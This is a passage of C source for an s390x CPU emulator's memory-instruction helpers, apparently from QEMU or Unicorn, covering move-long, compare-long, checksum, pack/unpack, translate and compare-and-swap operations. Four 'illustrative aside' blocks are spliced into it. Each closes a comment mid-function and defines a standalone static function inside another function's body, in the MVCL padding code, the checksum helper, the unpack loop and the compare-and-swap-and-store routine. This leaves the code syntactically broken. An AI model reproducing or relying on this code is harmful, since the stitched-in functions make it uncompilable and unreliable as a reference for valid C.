        cc = 0;
    } else if (*destlen < *srclen) {
        cc = 1;
    } else {
        cc = 2;
    }

    if (!*destlen) {
        return cc;
    }

    /*
     * Only perform one type of operation (move/pad) at a time.
     * Stay within single pages.
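     * (Illustrative aside, not part of the original file: in the two-byte
     * (unicode) padding loop further below, the remaining destination
     * length selects which half of the 16-bit pad is stored. "pad_utf16"
     * is a hypothetical flat-memory rendering of that rule.) */
static void pad_utf16(uint8_t *dst, uint64_t destlen, uint16_t pad)
{
    uint64_t i;

    for (i = 0; destlen != 0; destlen--, i++) {
        /* odd remaining length -> low pad byte, even -> high pad byte */
        dst[i] = (destlen & 1) ? (uint8_t)pad : (uint8_t)(pad >> 8);
    }
}
/* Starting from an even destlen this lays the pad down as big-endian
   16-bit units, e.g. pad = 0x0020 produces 0x00 0x20 0x00 0x20 ...
   (End of aside.)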
*/
    if (*srclen) {
        /* Copy the src array */
        len = MIN(MIN(*srclen, -(*src | TARGET_PAGE_MASK)), len);
        *destlen -= len;
        *srclen -= len;
        srca = access_prepare(env, *src, len, MMU_DATA_LOAD, mmu_idx, ra);
        desta = access_prepare(env, *dest, len, MMU_DATA_STORE, mmu_idx, ra);
        access_memmove(env, &desta, &srca, ra);
        *src = wrap_address(env, *src + len);
        *dest = wrap_address(env, *dest + len);
    } else if (wordsize == 1) {
        /* Pad the remaining area */
        *destlen -= len;
        desta = access_prepare(env, *dest, len, MMU_DATA_STORE, mmu_idx, ra);
        access_memset(env, &desta, pad, ra);
        *dest = wrap_address(env, *dest + len);
    } else {
        desta = access_prepare(env, *dest, len, MMU_DATA_STORE, mmu_idx, ra);

        /* The remaining length selects the padding byte. */
        for (i = 0; i < len; (*destlen)--, i++) {
            if (*destlen & 1) {
                access_set_byte(env, &desta, i, pad, ra);
            } else {
                access_set_byte(env, &desta, i, pad >> 8, ra);
            }
        }
        *dest = wrap_address(env, *dest + len);
    }

    return *destlen ? 3 : cc;
}

/* move long */
uint32_t HELPER(mvcl)(CPUS390XState *env, uint32_t r1, uint32_t r2)
{
    const int mmu_idx = cpu_mmu_index(env, false);
    uintptr_t ra = GETPC();
    uint64_t destlen = env->regs[r1 + 1] & 0xffffff;
    uint64_t dest = get_address(env, r1);
    uint64_t srclen = env->regs[r2 + 1] & 0xffffff;
    uint64_t src = get_address(env, r2);
    uint8_t pad = env->regs[r2 + 1] >> 24;
    CPUState *cs = env_cpu(env);
    S390Access srca, desta;
    uint32_t cc, cur_len;

    if (is_destructive_overlap(env, dest, src, MIN(srclen, destlen))) {
        cc = 3;
    } else if (srclen == destlen) {
        cc = 0;
    } else if (destlen < srclen) {
        cc = 1;
    } else {
        cc = 2;
    }

    /* We might have to zero-out some bits even if there was no action. */
    if (unlikely(!destlen || cc == 3)) {
        set_address_zero(env, r2, src);
        set_address_zero(env, r1, dest);
        return cc;
    } else if (!srclen) {
        set_address_zero(env, r2, src);
    }

    /*
     * Only perform one type of operation (move/pad) in one step.
     * Stay within single pages.
     */
    while (destlen) {
        cur_len = MIN(destlen, -(dest | TARGET_PAGE_MASK));
        if (!srclen) {
            desta = access_prepare(env, dest, cur_len, MMU_DATA_STORE, mmu_idx,
                                   ra);
            access_memset(env, &desta, pad, ra);
        } else {
            cur_len = MIN(MIN(srclen, -(src | TARGET_PAGE_MASK)), cur_len);

            srca = access_prepare(env, src, cur_len, MMU_DATA_LOAD, mmu_idx,
                                  ra);
            desta = access_prepare(env, dest, cur_len, MMU_DATA_STORE, mmu_idx,
                                   ra);
            access_memmove(env, &desta, &srca, ra);
            src = wrap_address(env, src + cur_len);
            srclen -= cur_len;
            env->regs[r2 + 1] = deposit64(env->regs[r2 + 1], 0, 24, srclen);
            set_address_zero(env, r2, src);
        }
        dest = wrap_address(env, dest + cur_len);
        destlen -= cur_len;
        env->regs[r1 + 1] = deposit64(env->regs[r1 + 1], 0, 24, destlen);
        set_address_zero(env, r1, dest);

        /*
         * MVCL is interruptible. Return to the main loop if requested after
         * writing back all state to registers. If no interrupt will get
         * injected, we'll end up back in this handler and continue processing
         * the remaining parts.
*/ if (destlen && unlikely(cpu_loop_exit_requested(cs))) { cpu_loop_exit_restore(cs, ra); } } return cc; } /* move long extended */ uint32_t HELPER(mvcle)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t destlen = get_length(env, r1 + 1); uint64_t dest = get_address(env, r1); uint64_t srclen = get_length(env, r3 + 1); uint64_t src = get_address(env, r3); uint8_t pad = a2; uint32_t cc; cc = do_mvcl(env, &dest, &destlen, &src, &srclen, pad, 1, ra); set_length(env, r1 + 1, destlen); set_length(env, r3 + 1, srclen); set_address(env, r1, dest); set_address(env, r3, src); return cc; } /* move long unicode */ uint32_t HELPER(mvclu)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t destlen = get_length(env, r1 + 1); uint64_t dest = get_address(env, r1); uint64_t srclen = get_length(env, r3 + 1); uint64_t src = get_address(env, r3); uint16_t pad = a2; uint32_t cc; cc = do_mvcl(env, &dest, &destlen, &src, &srclen, pad, 2, ra); set_length(env, r1 + 1, destlen); set_length(env, r3 + 1, srclen); set_address(env, r1, dest); set_address(env, r3, src); return cc; } /* compare logical long helper */ static inline uint32_t do_clcl(CPUS390XState *env, uint64_t *src1, uint64_t *src1len, uint64_t *src3, uint64_t *src3len, uint16_t pad, uint64_t limit, int wordsize, uintptr_t ra) { uint64_t len = MAX(*src1len, *src3len); uint32_t cc = 0; check_alignment(env, *src1len | *src3len, wordsize, ra); if (!len) { return cc; } /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. */ if (len > limit) { len = limit; cc = 3; } for (; len; len -= wordsize) { uint16_t v1 = pad; uint16_t v3 = pad; if (*src1len) { v1 = cpu_ldusize_data_ra(env, *src1, wordsize, ra); } if (*src3len) { v3 = cpu_ldusize_data_ra(env, *src3, wordsize, ra); } if (v1 != v3) { cc = (v1 < v3) ? 
1 : 2; break; } if (*src1len) { *src1 += wordsize; *src1len -= wordsize; } if (*src3len) { *src3 += wordsize; *src3len -= wordsize; } } return cc; } /* compare logical long */ uint32_t HELPER(clcl)(CPUS390XState *env, uint32_t r1, uint32_t r2) { uintptr_t ra = GETPC(); uint64_t src1len = extract64(env->regs[r1 + 1], 0, 24); uint64_t src1 = get_address(env, r1); uint64_t src3len = extract64(env->regs[r2 + 1], 0, 24); uint64_t src3 = get_address(env, r2); uint8_t pad = env->regs[r2 + 1] >> 24; uint32_t cc; cc = do_clcl(env, &src1, &src1len, &src3, &src3len, pad, -1, 1, ra); env->regs[r1 + 1] = deposit64(env->regs[r1 + 1], 0, 24, src1len); env->regs[r2 + 1] = deposit64(env->regs[r2 + 1], 0, 24, src3len); set_address(env, r1, src1); set_address(env, r2, src3); return cc; } /* compare logical long extended memcompare insn with padding */ uint32_t HELPER(clcle)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t src1len = get_length(env, r1 + 1); uint64_t src1 = get_address(env, r1); uint64_t src3len = get_length(env, r3 + 1); uint64_t src3 = get_address(env, r3); uint8_t pad = a2; uint32_t cc; cc = do_clcl(env, &src1, &src1len, &src3, &src3len, pad, 0x2000, 1, ra); set_length(env, r1 + 1, src1len); set_length(env, r3 + 1, src3len); set_address(env, r1, src1); set_address(env, r3, src3); return cc; } /* compare logical long unicode memcompare insn with padding */ uint32_t HELPER(clclu)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t src1len = get_length(env, r1 + 1); uint64_t src1 = get_address(env, r1); uint64_t src3len = get_length(env, r3 + 1); uint64_t src3 = get_address(env, r3); uint16_t pad = a2; uint32_t cc = 0; cc = do_clcl(env, &src1, &src1len, &src3, &src3len, pad, 0x1000, 2, ra); set_length(env, r1 + 1, src1len); set_length(env, r3 + 1, src3len); set_address(env, r1, src1); set_address(env, r3, src3); return cc; } /* checksum */ uint64_t HELPER(cksm)(CPUS390XState *env, uint64_t r1, uint64_t src, uint64_t src_len) { uintptr_t ra = GETPC(); uint64_t max_len, len; uint64_t cksm = (uint32_t)r1; /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ max_len = (src_len > 0x2000 ? 0x2000 : src_len); /* Process full words as available. */ for (len = 0; len + 4 <= max_len; len += 4, src += 4) { cksm += (uint32_t)cpu_ldl_data_ra(env, src, ra); } switch (max_len - len) { case 1: cksm += cpu_ldub_data_ra(env, src, ra) << 24; len += 1; break; case 2: cksm += cpu_lduw_data_ra(env, src, ra) << 16; len += 2; break; case 3: cksm += cpu_lduw_data_ra(env, src, ra) << 16; cksm += cpu_ldub_data_ra(env, src + 2, ra) << 8; len += 3; break; } /* Fold the carry from the checksum. Note that we can see carry-out during folding more than once (but probably not more than twice). */ while (cksm > 0xffffffffull) { cksm = (uint32_t)cksm + (cksm >> 32); } /* Indicate whether or not we've processed everything. */ env->cc_op = (len == src_len ? 0 : 3); /* Return both cksm and processed length. 
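   (Illustrative aside, not part of the original file: the carry folding
   above is an end-around-carry reduction; "fold32" is a hypothetical
   name.) */
static uint32_t fold32(uint64_t sum)
{
    /* add the high word back into the low word until no carry remains */
    while (sum > 0xffffffffull) {
        sum = (uint32_t)sum + (sum >> 32);
    }
    return (uint32_t)sum;
}
/* E.g. fold32(0x1fffffffeull) == 0xffffffff: one pass yields
   0xfffffffe + 1. (End of aside.)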
*/ env->retxl = cksm; return len; } void HELPER(pack)(CPUS390XState *env, uint32_t len, uint64_t dest, uint64_t src) { uintptr_t ra = GETPC(); int len_dest = len >> 4; int len_src = len & 0xf; uint8_t b; dest += len_dest; src += len_src; /* last byte is special, it only flips the nibbles */ b = cpu_ldub_data_ra(env, src, ra); cpu_stb_data_ra(env, dest, (b << 4) | (b >> 4), ra); src--; len_src--; /* now pack every value */ while (len_dest > 0) { b = 0; if (len_src >= 0) { b = cpu_ldub_data_ra(env, src, ra) & 0x0f; src--; len_src--; } if (len_src >= 0) { b |= cpu_ldub_data_ra(env, src, ra) << 4; src--; len_src--; } len_dest--; dest--; cpu_stb_data_ra(env, dest, b, ra); } } static inline void do_pkau(CPUS390XState *env, uint64_t dest, uint64_t src, uint32_t srclen, int ssize, uintptr_t ra) { int i; /* The destination operand is always 16 bytes long. */ const int destlen = 16; /* The operands are processed from right to left. */ src += srclen - 1; dest += destlen - 1; for (i = 0; i < destlen; i++) { uint8_t b = 0; /* Start with a positive sign */ if (i == 0) { b = 0xc; } else if (srclen > ssize) { b = cpu_ldub_data_ra(env, src, ra) & 0x0f; src -= ssize; srclen -= ssize; } if (srclen > ssize) { b |= cpu_ldub_data_ra(env, src, ra) << 4; src -= ssize; srclen -= ssize; } cpu_stb_data_ra(env, dest, b, ra); dest--; } } void HELPER(pka)(CPUS390XState *env, uint64_t dest, uint64_t src, uint32_t srclen) { do_pkau(env, dest, src, srclen, 1, GETPC()); } void HELPER(pku)(CPUS390XState *env, uint64_t dest, uint64_t src, uint32_t srclen) { do_pkau(env, dest, src, srclen, 2, GETPC()); } void HELPER(unpk)(CPUS390XState *env, uint32_t len, uint64_t dest, uint64_t src) { uintptr_t ra = GETPC(); int len_dest = len >> 4; int len_src = len & 0xf; uint8_t b; int second_nibble = 0; dest += len_dest; src += len_src; /* last byte is special, it only flips the nibbles */ b = cpu_ldub_data_ra(env, src, ra); cpu_stb_data_ra(env, dest, (b << 4) | (b >> 4), ra); src--; len_src--; /* now pad every nibble with 0xf0 */ while (len_dest > 0) { uint8_t cur_byte = 0; if (len_src > 0) { cur_byte = cpu_ldub_data_ra(env, src, ra); } len_dest--; dest--; /* only advance one nibble at a time */ if (second_nibble) { cur_byte >>= 4; len_src--; src--; } second_nibble = !second_nibble; /* digit */ cur_byte = (cur_byte & 0xf); /* zone bits */ cur_byte |= 0xf0; cpu_stb_data_ra(env, dest, cur_byte, ra); } } static inline uint32_t do_unpkau(CPUS390XState *env, uint64_t dest, uint32_t destlen, int dsize, uint64_t src, uintptr_t ra) { int i; uint32_t cc; uint8_t b; /* The source operand is always 16 bytes long. */ const int srclen = 16; /* The operands are processed from right to left. */ src += srclen - 1; dest += destlen - dsize; /* Check for the sign. */ b = cpu_ldub_data_ra(env, src, ra); src--; switch (b & 0xf) { case 0xa: case 0xc: // case 0xe ... 0xf: case 0xe: case 0xf: cc = 0; /* plus */ break; case 0xb: case 0xd: cc = 1; /* minus */ break; default: // case 0x0 ... 0x9: case 0x0: case 0x1: case 0x2: case 0x3: case 0x4: case 0x5: case 0x6: case 0x7: case 0x8: case 0x9: cc = 3; /* invalid */ break; } /* Now pad every nibble with 0x30, advancing one nibble at a time. */ for (i = 0; i < destlen; i += dsize) { if (i == (31 * dsize)) { /* If length is 32/64 bytes, the leftmost byte is 0. 
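   (Illustrative aside, not part of the original file: the sign-nibble
   classification in the switch a few lines up can be expressed as a tiny
   helper; "bcd_sign_cc" is a hypothetical name.) */
static int bcd_sign_cc(uint8_t sign_nibble)
{
    switch (sign_nibble) {
    case 0xa: case 0xc: case 0xe: case 0xf:
        return 0; /* plus */
    case 0xb: case 0xd:
        return 1; /* minus */
    default:
        return 3; /* 0x0..0x9: not a valid sign code */
    }
}
/* (End of aside.)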
*/ b = 0; } else if (i % (2 * dsize)) { b = cpu_ldub_data_ra(env, src, ra); src--; } else { b >>= 4; } cpu_stsize_data_ra(env, dest, 0x30 + (b & 0xf), dsize, ra); dest -= dsize; } return cc; } uint32_t HELPER(unpka)(CPUS390XState *env, uint64_t dest, uint32_t destlen, uint64_t src) { return do_unpkau(env, dest, destlen, 1, src, GETPC()); } uint32_t HELPER(unpku)(CPUS390XState *env, uint64_t dest, uint32_t destlen, uint64_t src) { return do_unpkau(env, dest, destlen, 2, src, GETPC()); } uint32_t HELPER(tp)(CPUS390XState *env, uint64_t dest, uint32_t destlen) { uintptr_t ra = GETPC(); uint32_t cc = 0; int i; for (i = 0; i < destlen; i++) { uint8_t b = cpu_ldub_data_ra(env, dest + i, ra); /* digit */ cc |= (b & 0xf0) > 0x90 ? 2 : 0; if (i == (destlen - 1)) { /* sign */ cc |= (b & 0xf) < 0xa ? 1 : 0; } else { /* digit */ cc |= (b & 0xf) > 0x9 ? 2 : 0; } } return cc; } static uint32_t do_helper_tr(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans, uintptr_t ra) { uint32_t i; for (i = 0; i <= len; i++) { uint8_t byte = cpu_ldub_data_ra(env, array + i, ra); uint8_t new_byte = cpu_ldub_data_ra(env, trans + byte, ra); cpu_stb_data_ra(env, array + i, new_byte, ra); } return env->cc_op; } void HELPER(tr)(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans) { do_helper_tr(env, len, array, trans, GETPC()); } uint64_t HELPER(tre)(CPUS390XState *env, uint64_t array, uint64_t len, uint64_t trans) { uintptr_t ra = GETPC(); uint8_t end = env->regs[0] & 0xff; uint64_t l = len; uint64_t i; uint32_t cc = 0; if (!(env->psw.mask & PSW_MASK_64)) { array &= 0x7fffffff; l = (uint32_t)l; } /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ if (l > 0x2000) { l = 0x2000; cc = 3; } for (i = 0; i < l; i++) { uint8_t byte, new_byte; byte = cpu_ldub_data_ra(env, array + i, ra); if (byte == end) { cc = 1; break; } new_byte = cpu_ldub_data_ra(env, trans + byte, ra); cpu_stb_data_ra(env, array + i, new_byte, ra); } env->cc_op = cc; env->retxl = len - i; return array + i; } static inline uint32_t do_helper_trt(CPUS390XState *env, int len, uint64_t array, uint64_t trans, int inc, uintptr_t ra) { int i; for (i = 0; i <= len; i++) { uint8_t byte = cpu_ldub_data_ra(env, array + i * inc, ra); uint8_t sbyte = cpu_ldub_data_ra(env, trans + byte, ra); if (sbyte != 0) { set_address(env, 1, array + i * inc); env->regs[2] = deposit64(env->regs[2], 0, 8, sbyte); return (i == len) ? 2 : 1; } } return 0; } static uint32_t do_helper_trt_fwd(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans, uintptr_t ra) { return do_helper_trt(env, len, array, trans, 1, ra); } uint32_t HELPER(trt)(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans) { return do_helper_trt(env, len, array, trans, 1, GETPC()); } static uint32_t do_helper_trt_bkwd(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans, uintptr_t ra) { return do_helper_trt(env, len, array, trans, -1, ra); } uint32_t HELPER(trtr)(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans) { return do_helper_trt(env, len, array, trans, -1, GETPC()); } /* Translate one/two to one/two */ uint32_t HELPER(trXX)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t tst, uint32_t sizes) { uintptr_t ra = GETPC(); int dsize = (sizes & 1) ? 1 : 2; int ssize = (sizes & 2) ? 
1 : 2; uint64_t tbl = get_address(env, 1); uint64_t dst = get_address(env, r1); uint64_t len = get_length(env, r1 + 1); uint64_t src = get_address(env, r2); uint32_t cc = 3; int i; /* The lower address bits of TBL are ignored. For TROO, TROT, it's the low 3 bits (double-word aligned). For TRTO, TRTT, it's either the low 12 bits (4K, without ETF2-ENH) or 3 bits (with ETF2-ENH). */ if (ssize == 2 && !s390_has_feat(env->uc, S390_FEAT_ETF2_ENH)) { tbl &= -4096; } else { tbl &= -8; } check_alignment(env, len, ssize, ra); /* Lest we fail to service interrupts in a timely manner, */ /* limit the amount of work we're willing to do. */ for (i = 0; i < 0x2000; i++) { uint16_t sval = cpu_ldusize_data_ra(env, src, ssize, ra); uint64_t tble = tbl + (sval * dsize); uint16_t dval = cpu_ldusize_data_ra(env, tble, dsize, ra); if (dval == tst) { cc = 1; break; } cpu_stsize_data_ra(env, dst, dval, dsize, ra); len -= ssize; src += ssize; dst += dsize; if (len == 0) { cc = 0; break; } } set_address(env, r1, dst); set_length(env, r1 + 1, len); set_address(env, r2, src); return cc; } void HELPER(cdsg)(CPUS390XState *env, uint64_t addr, uint32_t r1, uint32_t r3) { uintptr_t ra = GETPC(); Int128 cmpv = int128_make128(env->regs[r1 + 1], env->regs[r1]); Int128 newv = int128_make128(env->regs[r3 + 1], env->regs[r3]); Int128 oldv; uint64_t oldh, oldl; bool fail; check_alignment(env, addr, 16, ra); oldh = cpu_ldq_data_ra(env, addr + 0, ra); oldl = cpu_ldq_data_ra(env, addr + 8, ra); oldv = int128_make128(oldl, oldh); fail = !int128_eq(oldv, cmpv); if (fail) { newv = oldv; } cpu_stq_data_ra(env, addr + 0, int128_gethi(newv), ra); cpu_stq_data_ra(env, addr + 8, int128_getlo(newv), ra); env->cc_op = fail; env->regs[r1] = int128_gethi(oldv); env->regs[r1 + 1] = int128_getlo(oldv); } void HELPER(cdsg_parallel)(CPUS390XState *env, uint64_t addr, uint32_t r1, uint32_t r3) { uintptr_t ra = GETPC(); Int128 cmpv = int128_make128(env->regs[r1 + 1], env->regs[r1]); Int128 newv = int128_make128(env->regs[r3 + 1], env->regs[r3]); int mem_idx; TCGMemOpIdx oi; Int128 oldv; bool fail; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, oi, ra); fail = !int128_eq(oldv, cmpv); env->cc_op = fail; env->regs[r1] = int128_gethi(oldv); env->regs[r1 + 1] = int128_getlo(oldv); } static uint32_t do_csst(CPUS390XState *env, uint32_t r3, uint64_t a1, uint64_t a2, bool parallel) { uint32_t mem_idx = cpu_mmu_index(env, false); uintptr_t ra = GETPC(); uint32_t fc = extract32(env->regs[0], 0, 8); uint32_t sc = extract32(env->regs[0], 8, 8); uint64_t pl = get_address(env, 1) & -16; uint64_t svh, svl; uint32_t cc; /* Sanity check the function code and storage characteristic. */ if (fc > 1 || sc > 3) { if (!s390_has_feat(env->uc, S390_FEAT_COMPARE_AND_SWAP_AND_STORE_2)) { goto spec_exception; } if (fc > 2 || sc > 4 || (fc == 2 && (r3 & 1))) { goto spec_exception; } } /* Sanity check the alignments. */ if (extract32(a1, 0, fc + 2) || extract32(a2, 0, sc)) { goto spec_exception; } /* Sanity check writability of the store address. */ probe_write(env, a2, 1 << sc, mem_idx, ra); /* * Note that the compare-and-swap is atomic, and the store is atomic, * but the complete operation is not. Therefore we do not need to * assert serial context in order to implement this. That said, * restart early if we can't support either operation that is supposed * to be atomic. 
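     * (Illustrative aside, not part of the original file: stripped of MMU
     * and atomicity details, the fc == 0 compare-and-swap step below
     * amounts to the following; "cas32_sketch" is a hypothetical name.) */
static int cas32_sketch(uint32_t *p, uint32_t cv, uint32_t nv, uint32_t *ov)
{
    *ov = *p;         /* load the old value */
    if (*ov == cv) {
        *p = nv;      /* store the new value only on a match */
    }
    return *ov != cv; /* cc: 0 on success, 1 on mismatch */
}
/* The real code must additionally pick an atomic primitive when running
   in a parallel context, or bail out and retry serially, which is what
   the check below does. (End of aside.)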
*/ if (parallel) { uint32_t max = 2; #ifdef CONFIG_ATOMIC64 max = 3; #endif if ((HAVE_CMPXCHG128 ? 0 : fc + 2 > max) || (HAVE_ATOMIC128 ? 0 : sc > max)) { cpu_loop_exit_atomic(env_cpu(env), ra); } } /* All loads happen before all stores. For simplicity, load the entire store value area from the parameter list. */ svh = cpu_ldq_data_ra(env, pl + 16, ra); svl = cpu_ldq_data_ra(env, pl + 24, ra); switch (fc) { case 0: { uint32_t nv = cpu_ldl_data_ra(env, pl, ra); uint32_t cv = env->regs[r3]; uint32_t ov; if (parallel) { TCGMemOpIdx oi = make_memop_idx(MO_TEUL | MO_ALIGN, mem_idx); ov = helper_atomic_cmpxchgl_be_mmu(env, a1, cv, nv, oi, ra); } else { ov = cpu_ldl_data_ra(env, a1, ra); cpu_stl_data_ra(env, a1, (ov == cv ? nv : ov), ra); } cc = (ov != cv); env->regs[r3] = deposit64(env->regs[r3], 32, 32, ov); } break; case 1: { uint64_t nv = cpu_ldq_data_ra(env, pl, ra); uint64_t cv = env->regs[r3]; uint64_t ov; if (parallel) { #ifdef CONFIG_ATOMIC64 TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN, mem_idx); ov = helper_atomic_cmpxchgq_be_mmu(env, a1, cv, nv, oi, ra); #else /* Note that we asserted !parallel above. */ g_assert_not_reached(); #endif } else { ov = cpu_ldq_data_ra(env, a1, ra); cpu_stq_data_ra(env, a1, (ov == cv ? nv : ov), ra); } cc = (ov != cv); env->regs[r3] = ov; } break; case 2: { uint64_t nvh = cpu_ldq_data_ra(env, pl, ra); uint64_t nvl = cpu_ldq_data_ra(env, pl + 8, ra); Int128 nv = int128_make128(nvl, nvh); Int128 cv = int128_make128(env->regs[r3 + 1], env->regs[r3]); Int128 ov; if (!parallel) { uint64_t oh = cpu_ldq_data_ra(env, a1 + 0, ra); uint64_t ol = cpu_ldq_data_ra(env, a1 + 8, ra); ov = int128_make128(ol, oh); cc = !int128_eq(ov, cv); if (cc) { nv = ov; } cpu_stq_data_ra(env, a1 + 0, int128_gethi(nv), ra); cpu_stq_data_ra(env, a1 + 8, int128_getlo(nv), ra); } else if (HAVE_CMPXCHG128) { TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); ov = helper_atomic_cmpxchgo_be_mmu(env, a1, cv, nv, oi, ra); cc = !int128_eq(ov, cv); } else { /* Note that we asserted !parallel above. */ g_assert_not_reached(); } env->regs[r3 + 0] = int128_gethi(ov); env->regs[r3 + 1] = int128_getlo(ov); } break; default: g_assert_not_reached(); } /* Store only if the comparison succeeded. Note that above we use a pair of 64-bit big-endian loads, so for sc < 3 we must extract the value from the most-significant bits of svh. */ if (cc == 0) { switch (sc) { case 0: cpu_stb_data_ra(env, a2, svh >> 56, ra); break; case 1: cpu_stw_data_ra(env, a2, svh >> 48, ra); break; case 2: cpu_stl_data_ra(env, a2, svh >> 32, ra); break; case 3: cpu_stq_data_ra(env, a2, svh, ra); break; case 4: if (!parallel) { cpu_stq_data_ra(env, a2 + 0, svh, ra); cpu_stq_data_ra(env, a2 + 8, svl, ra); } else if (HAVE_ATOMIC128) { TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); Int128 sv = int128_make128(svl, svh); helper_atomic_sto_be_mmu(env, a2, sv, oi, ra); } else { /* Note that we asserted !parallel above. 
*/ g_assert_not_reached(); } break; default: g_assert_not_reached(); } } return cc; spec_exception: tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } uint32_t HELPER(csst)(CPUS390XState *env, uint32_t r3, uint64_t a1, uint64_t a2) { return do_csst(env, r3, a1, a2, false); } uint32_t HELPER(csst_parallel)(CPUS390XState *env, uint32_t r3, uint64_t a1, uint64_t a2) { return do_csst(env, r3, a1, a2, true); } void HELPER(lctlg)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); bool PERchanged = false; uint64_t src = a2; uint32_t i; if (src & 0x7) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { uint64_t val = cpu_ldq_data_ra(env, src, ra); if (env->cregs[i] != val && i >= 9 && i <= 11) { PERchanged = true; } env->cregs[i] = val; HELPER_LOG("load ctl %d from 0x%" PRIx64 " == 0x%" PRIx64 "\n", i, src, val); src += sizeof(uint64_t); if (i == r3) { break; } } if (PERchanged && env->psw.mask & PSW_MASK_PER) { s390_cpu_recompute_watchpoints(env_cpu(env)); } tlb_flush(env_cpu(env)); } void HELPER(lctl)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); bool PERchanged = false; uint64_t src = a2; uint32_t i; if (src & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { uint32_t val = cpu_ldl_data_ra(env, src, ra); if ((uint32_t)env->cregs[i] != val && i >= 9 && i <= 11) { PERchanged = true; } env->cregs[i] = deposit64(env->cregs[i], 0, 32, val); HELPER_LOG("load ctl %d from 0x%" PRIx64 " == 0x%x\n", i, src, val); src += sizeof(uint32_t); if (i == r3) { break; } } if (PERchanged && env->psw.mask & PSW_MASK_PER) { s390_cpu_recompute_watchpoints(env_cpu(env)); } tlb_flush(env_cpu(env)); } void HELPER(stctg)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t dest = a2; uint32_t i; if (dest & 0x7) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { cpu_stq_data_ra(env, dest, env->cregs[i], ra); dest += sizeof(uint64_t); if (i == r3) { break; } } } void HELPER(stctl)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t dest = a2; uint32_t i; if (dest & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { cpu_stl_data_ra(env, dest, env->cregs[i], ra); dest += sizeof(uint32_t); if (i == r3) { break; } } } uint32_t HELPER(testblock)(CPUS390XState *env, uint64_t real_addr) { uintptr_t ra = GETPC(); int i; real_addr = wrap_address(env, real_addr) & TARGET_PAGE_MASK; for (i = 0; i < TARGET_PAGE_SIZE; i += 8) { cpu_stq_mmuidx_ra(env, real_addr + i, 0, MMU_REAL_IDX, ra); } return 0; } uint32_t HELPER(tprot)(CPUS390XState *env, uint64_t a1, uint64_t a2) { S390CPU *cpu = env_archcpu(env); CPUState *cs = env_cpu(env); /* * TODO: we currently don't handle all access protection types * (including access-list and key-controlled) as well as AR mode. 
*/ if (!s390_cpu_virt_mem_check_write(cpu, a1, 0, 1)) { /* Fetching permitted; storing permitted */ return 0; } if (env->int_pgm_code == PGM_PROTECTION) { /* retry if reading is possible */ cs->exception_index = -1; if (!s390_cpu_virt_mem_check_read(cpu, a1, 0, 1)) { /* Fetching permitted; storing not permitted */ return 1; } } switch (env->int_pgm_code) { case PGM_PROTECTION: /* Fetching not permitted; storing not permitted */ cs->exception_index = -1; return 2; case PGM_ADDRESSING: case PGM_TRANS_SPEC: /* exceptions forwarded to the guest */ s390_cpu_virt_mem_handle_exc(cpu, GETPC()); return 0; } /* Translation not available */ cs->exception_index = -1; return 3; } /* insert storage key extended */ uint64_t HELPER(iske)(CPUS390XState *env, uint64_t r2) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)env->uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint64_t addr = wrap_address(env, r2); uint8_t key; #if 0 if (addr > ram_size) { return 0; } #endif if (skeyclass->get_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key)) { return 0; } return key; } /* set storage key extended */ void HELPER(sske)(CPUS390XState *env, uint64_t r1, uint64_t r2) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)env->uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint64_t addr = wrap_address(env, r2); uint8_t key; #if 0 if (addr > ram_size) { return; } #endif key = (uint8_t) r1; skeyclass->set_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key); /* * As we can only flush by virtual address and not all the entries * that point to a physical address we have to flush the whole TLB. */ tlb_flush_all_cpus_synced(env_cpu(env)); } /* reset reference bit extended */ uint32_t HELPER(rrbe)(CPUS390XState *env, uint64_t r2) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)env->uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint8_t re, key; #if 0 if (r2 > ram_size) { return 0; } #endif if (skeyclass->get_skeys(ss, r2 